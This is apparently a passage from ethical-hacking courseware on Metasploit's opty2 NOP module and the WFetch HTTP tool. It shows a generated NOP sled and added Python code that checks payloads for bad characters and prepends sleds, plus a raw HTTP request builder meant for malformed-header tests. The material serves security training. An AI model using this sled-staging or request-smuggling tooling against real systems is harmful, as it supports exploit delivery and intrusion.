Note that -s means something different here than in the payload module's generate command: for a NOP module it names registers whose values the sled must not clobber, whereas for a payload it is the length of the NOP sled to prepend.

Module 12 Page 1663
65. Metasploit NOPS Module (continued)

    Command Prompt
    msf > use x86/opty2
    msf nop(opty2) > generate -h
    Usage: generate [options] length

To generate a 50-byte NOP sled that is displayed as a C-style buffer, run the following command:

    Command Prompt
    msf nop(opty2) > generate -t c 50
    unsigned char buf[] =
    "\xf5\x3d\x05\x15\xf8\x67\xba\x7d\x08\xd6\x66\x9f\xb8\x2d\xb6"
    "\x24\xbe\xb1\x3f\x43\x1d\x93\xb2\x37\x35\x84\xd5\x14\x40\xb4"
    "\xb3\x41\xb9\x48\x04\x99\x46\xa9\xb0\xb7\x2f\xfd\x96\x4a\x98"
    "\x92\xb5\xd4\x4f\x91";
    msf nop(opty2) >

Note that none of these 50 bytes is the classic 0x90 NOP: opty2 emits a varied mix of instructions with no useful side effects, which avoids the obvious run of 0x90 bytes that signature-based detection looks for.

Figure 12.25: Metasploit NOPS Module

Module 12 Page 1664
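Both the payload module (slides 61 and 62) and the NOP module (slides 64 and 65) hand the attacker a C-style buffer, and the work that follows is the same in each case: get the bytes back out of that text, make sure none of them is a character the vulnerable buffer cannot carry (what -b is for), and pad the front with a sled (what the payload module's -s does). The following is an added example, not EC-Council's or Metasploit's own code; the sample input is the 50-byte opty2 output from Figure 12.25 transcribed as a constant, and the sled it adds is plain 0x90 bytes rather than opty2's varied instructions.

```python
"""Handle payload and NOP buffers in the C-style format that `generate -t c`
prints: parse the buffer back to bytes, check it for bad characters (what the
-b option avoids), prepend a NOP sled (what the payload module's -s option
does) and format the result as a C buffer again.

Added example, not EC-Council's or Metasploit's own code.  The sample buffer
is the 50-byte x86/opty2 sled from Figure 12.25, transcribed as a constant;
the sled added here is plain 0x90 bytes, whereas opty2 produces a varied mix
of no-effect instructions.
"""
import re

# Constructed sample input: the opty2 output shown in Figure 12.25.
OPTY2_SLED_C = r'''unsigned char buf[] =
"\xf5\x3d\x05\x15\xf8\x67\xba\x7d\x08\xd6\x66\x9f\xb8\x2d\xb6"
"\x24\xbe\xb1\x3f\x43\x1d\x93\xb2\x37\x35\x84\xd5\x14\x40\xb4"
"\xb3\x41\xb9\x48\x04\x99\x46\xa9\xb0\xb7\x2f\xfd\x96\x4a\x98"
"\x92\xb5\xd4\x4f\x91";'''


def parse_c_buffer(text):
    """Convert a C string buffer of \\xNN escapes into bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))


def to_c_buffer(data, name="buf", per_line=15):
    """Format bytes as Metasploit's `generate -t c` does: 15 bytes per line."""
    lines = [f"unsigned char {name}[] ="]
    if not data:
        lines.append('""')
    for i in range(0, len(data), per_line):
        chunk = data[i:i + per_line]
        lines.append('"' + "".join(f"\\x{b:02x}" for b in chunk) + '"')
    lines[-1] += ";"
    return "\n".join(lines)


def find_bad_chars(data, bad):
    """Offsets at which a forbidden byte occurs; an empty list means the buffer is clean."""
    forbidden = set(bad)
    return [i for i, b in enumerate(data) if b in forbidden]


def add_nop_sled(payload, length, nop=0x90):
    """Prepend a sled of `length` NOP bytes (plain 0x90 here)."""
    if length < 0:
        raise ValueError("sled length must be non-negative")
    return bytes([nop]) * length + payload


def stage(payload, bad, sled_length):
    """Refuse payloads containing bad characters, otherwise return sled + payload."""
    hits = find_bad_chars(payload, bad)
    if hits:
        raise ValueError(f"bad characters at offsets {hits}; re-generate with -b or -e")
    return add_nop_sled(payload, sled_length)


if __name__ == "__main__":
    sled = parse_c_buffer(OPTY2_SLED_C)
    print(len(sled), "bytes, bad-char hits for \\x00\\xff:", find_bad_chars(sled, b"\x00\xff"))
    print(to_c_buffer(stage(b"\xcc", b"\x00\xff", 16)))
```

The bad-character scan is the check worth running on every generated buffer before it goes into an exploit: an encoder chosen with -e is only correct if its decoder stub is itself free of the forbidden bytes, and this catches the case where it is not.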
66. Web Server Attack Tools: WFetch

Source: http://www.microsoft.com

WFetch allows an attacker to fully customize an HTTP request and send it to a web server to see the raw HTTP request and response data. It allows an attacker to test the performance of websites that contain new elements such as Active Server Pages (ASP) or wireless protocols.

WFetch is a graphical user interface aimed at helping customers resolve problems related to browser interaction with Microsoft's IIS web server. It allows a client to reproduce a problem with a lightweight, very HTTP-friendly test environment. It allows for very granular testing down to the authentication, authorization, custom headers, and much more.

[Screenshot: WFetch main window, showing the verb (GET), host, path, authentication and connection options, and the raw request/response log output]

Module 12 Page 1665
67. [Screenshot: WFetch request window; the log output reads "Last Status: 500 Internal Server Error"]

Figure 12.26: Wfetch Screenshot

Module 12 Page 1666
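What WFetch does from its GUI, composing a request header by header and showing the raw bytes that come back, is straightforward to reproduce over a plain socket, which is useful when the server behaviour depends on header order, casing or a deliberately odd value that a browser or curl would normalise away. The following is an added example, not EC-Council's or Microsoft's code: it builds the request bytes, adds only the Host, Content-Length and Connection headers the caller did not supply, and parses the status line of the raw response (a 500 Internal Server Error, as in Figure 12.26, is then easy to spot). The host, path and header values in the usage section are assumptions for illustration.

```python
"""Hand-build an HTTP request byte for byte and inspect the raw response, the
check WFetch performs from a GUI.

Added example, not EC-Council's or Microsoft's code.  Host, path and header
values in the usage section are assumptions for illustration; send requests
only to servers you are authorised to test.
"""
import socket

CRLF = "\r\n"


def build_request(method, host, path="/", headers=None, body=b"", version="HTTP/1.1"):
    """Return the raw request bytes.

    Headers are emitted in the order given, so ordering, casing and odd values
    reach the server exactly as typed.  Host, Content-Length (when there is a
    body or the method normally carries one) and Connection: close are added
    only if the caller did not supply them.
    """
    hdrs = dict(headers or {})
    hdrs.setdefault("Host", host)
    if body or method in ("POST", "PUT", "PATCH"):
        hdrs.setdefault("Content-Length", str(len(body)))
    hdrs.setdefault("Connection", "close")  # so the server closes and recv() ends
    head = f"{method} {path} {version}{CRLF}"
    head += "".join(f"{name}: {value}{CRLF}" for name, value in hdrs.items())
    return head.encode("latin-1") + CRLF.encode("ascii") + body


def parse_status(raw_response):
    """Return (status code, reason) from a raw response, e.g. (500, 'Internal Server Error')."""
    status_line = raw_response.split(b"\r\n", 1)[0].decode("latin-1", "replace")
    parts = status_line.split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("HTTP/") or not parts[1].isdigit():
        raise ValueError(f"not an HTTP status line: {status_line!r}")
    return int(parts[1]), parts[2] if len(parts) == 3 else ""


def send_request(host, port, raw_request, timeout=5.0):
    """Send the raw request over a plain TCP socket and return the full raw response."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(raw_request)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    # Assumed target for illustration: a lab IIS host you are testing.
    req = build_request("GET", "localhost", "/default.asp",
                        {"User-Agent": "raw-http-probe/0.1", "Accept": "*/*"})
    print(req.decode("latin-1"))
    resp = send_request("localhost", 80, req)
    print(parse_status(resp))
    print(resp.decode("latin-1", "replace"))
```

Because nothing is normalised, the same builder can send a duplicate header, a Host value that differs from the connected address, or a Content-Length that disagrees with the body, which is exactly the kind of granular test the WFetch description refers to.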
